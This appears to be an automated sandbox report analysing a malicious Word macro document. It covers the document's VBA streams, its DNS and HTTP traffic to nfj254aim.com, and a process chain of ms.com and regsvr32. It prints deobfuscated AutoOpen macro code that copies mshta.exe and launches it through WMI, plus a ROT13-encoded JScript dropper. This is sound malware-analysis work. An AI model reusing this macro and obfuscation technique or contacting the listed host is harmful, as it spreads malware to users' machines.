Data Raw:	54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 61 48 38 78 6d 73 00 61 00 48 00 38 00 78 00 6d 00 73 00 00 00 61 52 5a 63 62 77 00 61 00 52 00 5a 00 63 00 62 00 77 00 00 00 61 62 68 30 52 67 00 61 00 62 00 68 00 30 00 52 00 67 00 00 00 61 37 41 35 6d 00 61 00 37 00 41 00 35 00 6d 00 00 00 61 64 47 62 50 41 00 61

Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4172

General
Stream Path:	VBA/_VBA_PROJECT
File Type:	data
Stream Size:	4172
Entropy:	4.76403916663
Base64 Encoded:	True
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
Data Raw:	cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2119

General
Stream Path:	VBA/__SRP_0
File Type:	data
Stream Size:	2119
Entropy:	3.47748136877
Base64 Encoded:	True
Data ASCII:	. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ Z . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . . . . A . . . . . . V H . . . . . . . . . . .
Data Raw:	93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00

Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 230

General
Stream Path:	VBA/__SRP_1
File Type:	data
Stream Size:	230
Entropy:	1.75961915218
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff

Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 348

General
Stream Path:	VBA/__SRP_2
File Type:	data
Stream Size:	348
Entropy:	1.78450864632
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . ` . . . A . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 91 07 00 00 00 00 00 00 00 00 00 00 c1 07 00 00 00 00 00 00 00 00 00 00 11 08

Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 106

General
Stream Path:	VBA/__SRP_3
File Type:	data
Stream Size:	106
Entropy:	1.35911194617
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . b . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 00 00 00 00 00 00 62 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00

Stream Path: VBA/dir, File Type: data, Stream Size: 775

General
Stream Path:	VBA/dir
File Type:	data
Stream Size:	775
Entropy:	6.59935768005
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . . . a . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . m . . .
Data Raw:	01 03 b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 95 d8 b6 61 10 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 3, 2020 10:12:14.717160940 CET	49711	80	192.168.2.3	104.28.6.227
Dec 3, 2020 10:12:14.744054079 CET	80	49711	104.28.6.227	192.168.2.3
Dec 3, 2020 10:12:14.744210958 CET	49711	80	192.168.2.3	104.28.6.227
Dec 3, 2020 10:12:14.774555922 CET	49711	80	192.168.2.3	104.28.6.227
Dec 3, 2020 10:12:14.801323891 CET	80	49711	104.28.6.227	192.168.2.3
Dec 3, 2020 10:12:15.259387970 CET	80	49711	104.28.6.227	192.168.2.3
Dec 3, 2020 10:12:15.259423018 CET	80	49711	104.28.6.227	192.168.2.3
Dec 3, 2020 10:12:15.259588957 CET	49711	80	192.168.2.3	104.28.6.227
Dec 3, 2020 10:12:19.342504025 CET	49711	80	192.168.2.3	104.28.6.227

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 3, 2020 10:12:04.872263908 CET	64185	53	192.168.2.3	8.8.8.8
Dec 3, 2020 10:12:04.899449110 CET	53	64185	8.8.8.8	192.168.2.3
Dec 3, 2020 10:12:05.977966070 CET	65110	53	192.168.2.3	8.8.8.8
Dec 3, 2020 10:12:06.005306005 CET	53	65110	8.8.8.8	192.168.2.3
Dec 3, 2020 10:12:07.103354931 CET	58361	53	192.168.2.3	8.8.8.8
Dec 3, 2020 10:12:07.139152050 CET	53	58361	8.8.8.8	192.168.2.3
Dec 3, 2020 10:12:09.160564899 CET	63492	53	192.168.2.3	8.8.8.8
Dec 3, 2020 10:12:09.187803984 CET	53	63492	8.8.8.8	192.168.2.3
Dec 3, 2020 10:12:10.486977100 CET	60831	53	192.168.2.3	8.8.8.8
Dec 3, 2020 10:12:10.514538050 CET	53	60831	8.8.8.8	192.168.2.3
Dec 3, 2020 10:12:11.725595951 CET	60100	53	192.168.2.3	8.8.8.8
Dec 3, 2020 10:12:11.763911009 CET	53	60100	8.8.8.8	192.168.2.3
Dec 3, 2020 10:12:12.123970032 CET	53195	53	192.168.2.3	8.8.8.8
Dec 3, 2020 10:12:12.181309938 CET	53	53195	8.8.8.8	192.168.2.3
Dec 3, 2020 10:12:13.119251966 CET	53195	53	192.168.2.3	8.8.8.8
Dec 3, 2020 10:12:13.154472113 CET	53	53195	8.8.8.8	192.168.2.3
Dec 3, 2020 10:12:14.142292023 CET	53195	53	192.168.2.3	8.8.8.8
Dec 3, 2020 10:12:14.185724974 CET	53	53195	8.8.8.8	192.168.2.3
Dec 3, 2020 10:12:14.652942896 CET	50141	53	192.168.2.3	8.8.8.8
Dec 3, 2020 10:12:14.693248034 CET	53	50141	8.8.8.8	192.168.2.3
Dec 3, 2020 10:12:16.145160913 CET	53195	53	192.168.2.3	8.8.8.8
Dec 3, 2020 10:12:16.182802916 CET	53	53195	8.8.8.8	192.168.2.3
Dec 3, 2020 10:12:20.156338930 CET	53195	53	192.168.2.3	8.8.8.8
Dec 3, 2020 10:12:20.191992044 CET	53	53195	8.8.8.8	192.168.2.3
Dec 3, 2020 10:12:35.233314991 CET	53023	53	192.168.2.3	8.8.8.8
Dec 3, 2020 10:12:35.260240078 CET	53	53023	8.8.8.8	192.168.2.3
Dec 3, 2020 10:12:35.375446081 CET	49563	53	192.168.2.3	8.8.8.8
Dec 3, 2020 10:12:35.411010981 CET	53	49563	8.8.8.8	192.168.2.3
Dec 3, 2020 10:12:40.677835941 CET	51352	53	192.168.2.3	8.8.8.8
Dec 3, 2020 10:12:40.704961061 CET	53	51352	8.8.8.8	192.168.2.3
Dec 3, 2020 10:12:41.510663986 CET	59349	53	192.168.2.3	8.8.8.8
Dec 3, 2020 10:12:41.537661076 CET	53	59349	8.8.8.8	192.168.2.3
Dec 3, 2020 10:12:42.374233961 CET	57084	53	192.168.2.3	8.8.8.8
Dec 3, 2020 10:12:42.401274920 CET	53	57084	8.8.8.8	192.168.2.3
Dec 3, 2020 10:12:43.279664993 CET	58823	53	192.168.2.3	8.8.8.8
Dec 3, 2020 10:12:43.315388918 CET	53	58823	8.8.8.8	192.168.2.3
Dec 3, 2020 10:12:44.258956909 CET	57568	53	192.168.2.3	8.8.8.8
Dec 3, 2020 10:12:44.285885096 CET	53	57568	8.8.8.8	192.168.2.3
Dec 3, 2020 10:12:46.834990025 CET	50540	53	192.168.2.3	8.8.8.8
Dec 3, 2020 10:12:46.862232924 CET	53	50540	8.8.8.8	192.168.2.3
Dec 3, 2020 10:12:48.029016018 CET	54366	53	192.168.2.3	8.8.8.8
Dec 3, 2020 10:12:48.055943966 CET	53	54366	8.8.8.8	192.168.2.3
Dec 3, 2020 10:12:48.889570951 CET	53034	53	192.168.2.3	8.8.8.8
Dec 3, 2020 10:12:48.916682005 CET	53	53034	8.8.8.8	192.168.2.3
Dec 3, 2020 10:12:49.686250925 CET	57762	53	192.168.2.3	8.8.8.8
Dec 3, 2020 10:12:49.713371992 CET	53	57762	8.8.8.8	192.168.2.3
Dec 3, 2020 10:12:54.746095896 CET	55435	53	192.168.2.3	8.8.8.8
Dec 3, 2020 10:12:54.773276091 CET	53	55435	8.8.8.8	192.168.2.3
Dec 3, 2020 10:12:55.001687050 CET	50713	53	192.168.2.3	8.8.8.8
Dec 3, 2020 10:12:55.045443058 CET	53	50713	8.8.8.8	192.168.2.3
Dec 3, 2020 10:13:10.023046017 CET	56132	53	192.168.2.3	8.8.8.8
Dec 3, 2020 10:13:10.050081968 CET	53	56132	8.8.8.8	192.168.2.3
Dec 3, 2020 10:13:15.319488049 CET	58987	53	192.168.2.3	8.8.8.8
Dec 3, 2020 10:13:15.356364965 CET	53	58987	8.8.8.8	192.168.2.3
Dec 3, 2020 10:13:45.000901937 CET	56579	53	192.168.2.3	8.8.8.8
Dec 3, 2020 10:13:45.027858973 CET	53	56579	8.8.8.8	192.168.2.3
Dec 3, 2020 10:13:46.729356050 CET	60633	53	192.168.2.3	8.8.8.8
Dec 3, 2020 10:13:46.756539106 CET	53	60633	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 3, 2020 10:12:14.652942896 CET	192.168.2.3	8.8.8.8	0xb1c0	Standard query (0)	nfj254aim.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Dec 3, 2020 10:12:14.693248034 CET	8.8.8.8	192.168.2.3	0xb1c0	No error (0)	nfj254aim.com	104.28.6.227	A (IP address)	IN (0x0001)
Dec 3, 2020 10:12:14.693248034 CET	8.8.8.8	192.168.2.3	0xb1c0	No error (0)	nfj254aim.com	104.28.7.227	A (IP address)	IN (0x0001)
Dec 3, 2020 10:12:14.693248034 CET	8.8.8.8	192.168.2.3	0xb1c0	No error (0)	nfj254aim.com	172.67.164.220	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

nfj254aim.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49711	104.28.6.227	80	C:\Users\Public\ms.com

Timestamp	kBytes transferred	Direction	Data
Dec 3, 2020 10:12:14.774555922 CET	222	OUT	GET /analytics/0D5FgQlJcMskzpbtgQBE7OE_tLI3/BUu5qgsI6FW8bkEsrF2HLHJUIr/lRD_7cnWmi/rwwHf1xOO/7n6dDzF/xspcd2?RltAN=vsETwS&G_=Ro_LgyQulrPjxaAj&wixw=XYJCRUJhgYHPY&bkUOD=AXjbvUQDbTcWkz HTTP/1.1 Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: nfj254aim.com Connection: Keep-Alive
Dec 3, 2020 10:12:15.259387970 CET	223	IN	HTTP/1.1 200 OK Date: Thu, 03 Dec 2020 09:12:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=db45345ad08a18f657e4a03edb0b079811606986734; expires=Sat, 02-Jan-21 09:12:14 GMT; path=/; domain=.nfj254aim.com; HttpOnly; SameSite=Lax X-Powered-By: PHP/7.2.34 CF-Cache-Status: DYNAMIC cf-request-id: 06c978b4c300004108a9184000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=H4niUpCS7%2BC208vQfiad1anE7NOXSNEYndum6HLdaELV%2FNuAJowlMmAjfBoiaJyI2IJmUbAyy30qCmG16MVq73eLeu8JV1tZ%2BMLPGCtd"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 5fbc2a346bd44108-PRG Content-Encoding: gzip Data Raw: 62 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3f 0f 82 30 14 c4 f7 7e 8a 27 bb 3c 20 8c 2f 1d 14 88 24 88 c4 94 c1 11 6d 4d 49 90 22 2d fe f9 f6 06 58 5c ef ee 77 77 b4 49 4e 7b 71 a9 52 38 88 63 01 55 bd 2b f2 3d 78 5b c4 3c 15 19 62 22 92 d5 89 fc 00 31 2d 3d ce 48 bb 47 c7 49 ab 46 72 46 ae 75 9d e2 71 10 43 69 1c 64 66 ea 25 e1 2a 32 c2 25 44 57 23 bf 33 17 f2 bf 8c 0e 39 a3 81 0b ad 60 54 cf 49 59 a7 24 d4 e7 02 bc 8f 1d 6e 32 f2 e0 dd 58 e8 8d 83 fb 0c 80 e9 c1 e9 d6 82 55 e3 4b 8d 3e e1 30 0f 2c d5 84 cb 25 f6 03 00 00 ff ff 03 00 0c 45 8d 50 cd 00 00 00 0d 0a Data Ascii: baL?0~'< /$mMI"-X\wwIN{qR8cU+=x[<b"1-=HGIFrFuqCidf%*2%DW#39`TIY$n2XUK>0,%EP
Dec 3, 2020 10:12:15.259423018 CET	223	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 1844 Parent PID: 792

General

Start time:	10:12:10
Start date:	03/12/2020
Path:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x1270000
File size:	1937688 bytes
MD5 hash:	0B9AB9B9C4DE429473D6450D4297A123
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: ms.com PID: 5308 Parent PID: 4940

General

Start time:	10:12:13
Start date:	03/12/2020
Path:	C:\Users\Public\ms.com
Wow64 process (32bit):	true
Commandline:	C:\users\public\ms.com C:\users\public\ms.html
Imagebase:	0xb30000
File size:	13312 bytes
MD5 hash:	7083239CE743FDB68DFC933B7308E80A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	moderate

Chronological Activities

Analysis Process: regsvr32.exe PID: 6192 Parent PID: 5308

General

Start time:	10:12:15
Start date:	03/12/2020
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\regsvr32.exe' C:\Users\user\AppData\Local\Temp\temp.tmp
Imagebase:	0x2b0000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: ThisDocument

Declaration

Line	Content
1	Attribute VB_Name = "ThisDocument"
2	Attribute VB_Base = "1Normal.ThisDocument"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = True
8	Attribute VB_Customizable = True

Module: a7A5m

Declaration

Line	Content
1	Attribute VB_Name = "a7A5m"

Executed Functions

Subroutine awAlq, APIs: 6, Strings: 0, Number of lines: 6, Relevance: 12.006

APIs	Meta Information
Part of subcall function akSqK@a7A5m: Replace
Part of subcall function akSqK@a7A5m: a7odJ
Part of subcall function aSGxU@a7A5m: Len
Part of subcall function aSGxU@a7A5m: Mid
a3IdJQ
create	SWbemObjectEx.create("C:\users\public\ms.com C:\users\public\ms.html") -> 0

Line	Instruction	Meta Information
42	Sub awAlq()
47	aYKyQ	executed
52	axIuO
65	agPh8 = akSqK(aSGxU(a3IdJQ))	a3IdJQ
66	CreateObject(agPh8).create (axSiN)	SWbemObjectEx.create("C:\users\public\ms.com C:\users\public\ms.html") -> 0 executed
67	End Sub

Function akSqK, APIs: 2, Strings: 1, Number of lines: 3, Relevance: 10.503

APIs

Meta Information

Replace

Replace(")c):)\)w)i)n)d)o)w)s)\)s)y)s)t)e)m)3)2)\)m)s)h)t)a).)e)x)e)",")","") -> c:\windows\system32\mshta.exe Replace(")C):)\)u)s)e)r)s)\)p)u)b)l)i)c)\)m)s).)c)o)m)",")","") -> C:\users\public\ms.com Replace(")C):)\)u)s)e)r)s)\)p)u)b)l)i)c)\)m)s).)h)t)m)l",")","") -> C:\users\public\ms.html Replace("win)mgm)ts:)roo)t\c)imv)2:W)in3)2_P)roc)ess",")","") -> winmgmts:root\cimv2:Win32_Process

a7odJ

Strings	Decrypted Strings
""""

Line	Instruction	Meta Information
39	Public Function akSqK(aPENSZ)
40	akSqK = Replace(aPENSZ, a7odJ, "")	Replace(")c):)\)w)i)n)d)o)w)s)\)s)y)s)t)e)m)3)2)\)m)s)h)t)a).)e)x)e)",")","") -> c:\windows\system32\mshta.exe a7odJ executed
41	End Function

Function aSGxU, APIs: 2, Strings: 0, Number of lines: 7, Relevance: 4.507

APIs	Meta Information
Len	Len("l)m)t)h).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)\|)m)o)c).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)\|)e)x)e).)a)t)h)s)m)\)2)3)m)e)t)s)y)s)\)s)w)o)d)n)i)w)\):)c)\|)o)t)o)m) )o)l)l)e)h)") -> 174 Len("sse)cor)P_2)3ni)W:2)vmi)c\t)oor):st)mgm)niw") -> 43
Mid

Line	Instruction	Meta Information
2	Function aSGxU(aie8CL)
33	For a6mGn = Len(aie8CL) To 1 Step - 1	Len("l)m)t)h).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)\|)m)o)c).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)\|)e)x)e).)a)t)h)s)m)\)2)3)m)e)t)s)y)s)\)s)w)o)d)n)i)w)\):)c)\|)o)t)o)m) )o)l)l)e)h)") -> 174 executed
34	azUoN = Mid(aie8CL, a6mGn, 1)	Mid
35	adHaPl = adHaPl & azUoN
36	Next	Len("l)m)t)h).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)\|)m)o)c).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)\|)e)x)e).)a)t)h)s)m)\)2)3)m)e)t)s)y)s)\)s)w)o)d)n)i)w)\):)c)\|)o)t)o)m) )o)l)l)e)h)") -> 174 executed
37	aSGxU = adHaPl
38	End Function

Module: aH8xms

Declaration

Line	Content
1	Attribute VB_Name = "aH8xms"

Executed Functions

Subroutine AutoOpen, APIs: 2, Strings: 0, Number of lines: 3, Relevance: 4.503

APIs	Meta Information
Part of subcall function awAlq@a7A5m: a3IdJQ
Part of subcall function awAlq@a7A5m: create

Line	Instruction	Meta Information
2	Sub AutoOpen()
3	awAlq	executed
4	End Sub

Module: aIsb7

Declaration

Line	Content
1	Attribute VB_Name = "aIsb7"

Executed Functions

Function aCqnt, APIs: 2, Strings: 0, Number of lines: 3, Relevance: 2.503

APIs	Meta Information
Part of subcall function akSqK@a7A5m: Replace
Part of subcall function akSqK@a7A5m: a7odJ

Line	Instruction	Meta Information
2	Function aCqnt(ayM1o)
6	aCqnt = akSqK(ayM1o)	executed
7	End Function

Function aMslO, APIs: 2, Strings: 0, Number of lines: 3, Relevance: 2.503

APIs	Meta Information
Part of subcall function akSqK@a7A5m: Replace
Part of subcall function akSqK@a7A5m: a7odJ

Line	Instruction	Meta Information
8	Function aMslO(aucpr)
13	aMslO = (akSqK(aucpr))	executed
14	End Function

Function ayUxA2, APIs: 2, Strings: 0, Number of lines: 3, Relevance: 2.503

APIs	Meta Information
Part of subcall function akSqK@a7A5m: Replace
Part of subcall function akSqK@a7A5m: a7odJ

Line	Instruction	Meta Information
15	Function ayUxA2(aT2PX)
20	ayUxA2 = (akSqK(aT2PX))	executed
21	End Function

Subroutine aVzRp, APIs: 1, Strings: 0, Number of lines: 5, Relevance: 1.255

APIs	Meta Information
Part of subcall function amZcqK@abh0Rg: FileCopy

Line	Instruction	Meta Information
27	Sub aVzRp()
28	acIr6u = aCqnt(adkJvD(0))	executed
29	adeKx = aMslO(adkJvD(1))
30	amZcqK acIr6u, adeKx
31	End Sub

Function a9vceZ, APIs: 1, Strings: 0, Number of lines: 3, Relevance: 1.253

APIs	Meta Information
Chr

Line	Instruction	Meta Information
62	Function a9vceZ(a48o6)
63	a9vceZ = Chr(a48o6)	Chr executed
64	End Function

Function a3eJx, APIs: 0, Strings: 0, Number of lines: 9, Relevance: 0.009000000000000001

Line	Instruction	Meta Information
35	Function a3eJx(aFP9Ao)
36	If aFP9Ao = 0 Then	executed
37	a3eJx = - 6824 + 6825
53	Elseif aFP9Ao = 5 Then
54	a3eJx = - 63 + 160
55	Else
56	a3eJx = 1049 - 25
57	Endif
58	End Function

Function axSiN, APIs: 0, Strings: 0, Number of lines: 5, Relevance: 0.005

Line	Instruction	Meta Information
22	Function axSiN()
23	adeKx = aMslO(adkJvD(1))	executed
24	aaqRT = ayUxA2(adkJvD(2))
25	axSiN = adeKx & " " & aaqRT
26	End Function

Function a3ox6, APIs: 0, Strings: 0, Number of lines: 3, Relevance: 0.003

Line	Instruction	Meta Information
32	Function a3ox6(a48o6)
33	a3ox6 = a48o6 + - 158 + 184	executed
34	End Function

Function aYzBn, APIs: 0, Strings: 0, Number of lines: 3, Relevance: 0.003

Line	Instruction	Meta Information
59	Function aYzBn(a48o6, a20NB)
60	aYzBn = a48o6 - a20NB	executed
61	End Function

Module: aOMv0

Declaration

Line	Content
1	Attribute VB_Name = "aOMv0"

Executed Functions

Function a6sXJE, APIs: 5, Strings: 0, Number of lines: 22, Relevance: 9.022

APIs	Meta Information
Len	Len("<ugzy> <obql> <fpevcg ynathntr="wninfpevcg"> ine n3ZDj4 = gehr; ine n3lnYb = -47909; shapgvba qrpbqr(vachg) { ine xrlfge = "NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm0123456789+/="; ine bhgchg = ""; ine pue1, pue2, pue3; ine rap1, rap2, rap3, rap4; ine v = 0; vachg = vachg.ercynpr(/[^N-Mn-m0-9\+\/\=]/t, ""); juvyr (v < vachg.yratgu) { rap1 = xrlfge.vaqrkBs(vachg.puneNg(v++)); rap2 = xrlfge.vaqrkBs(vachg.puneNg(v++)); rap3 = xrlfge.vaqrkBs(vachg.puneNg(v++)); rap4 = xrlfge.vaqrkBs(vachg.puneNg(v++)); pue1 = (rap1 << 2) \| (rap2 >> 4); pue2 = ((rap2 & 15) << 4) \| (rap3 >> 2); pue3 = ((rap3 & 3) << 6) \| rap4; bhgchg = bhgchg + Fgevat.sebzPunePbqr(pue1); vs(rap3 != 64) { bhgchg = bhgchg + Fgevat.sebzPunePbqr(pue2); } vs(rap4 != 64) { bhgchg = bhgchg + Fgevat.sebzPunePbqr(pue3); } } erghea(bhgchg); } ine nIRdc = gehr; ine ngcbN = "UXRL_PHEERAG_HFRE\\Fbsgjner\\nUtIG\\nhW5i2"; ine n7CwL = "n9VyF"; ine n4dtjh = n7CwL.yratgu; naQ3Jo = gehr; jvaqbj.erfvmrGb(1, 1); nwElY = -57746; ine nZhWU = gehr; jvaqbj.zbirGb(-101, -101); n2Bef = 17403; ine nWLt6 = gehr; ine nTWls = gehr; ine nCgZ7i = arj NpgvirKBowrpg("jfpevcg.furyy"); nuJ5n = 16458; nbdxF = "n21uHX"; ine njeCc = nbdxF.gbHccrePnfr(); ine nLCO4j = "ngbCL0"; nf14m = nLCO4j.gbFgevat(); ntMYZ = "nkQd5q"; n0CTb = snyfr; ine nxrv9d = 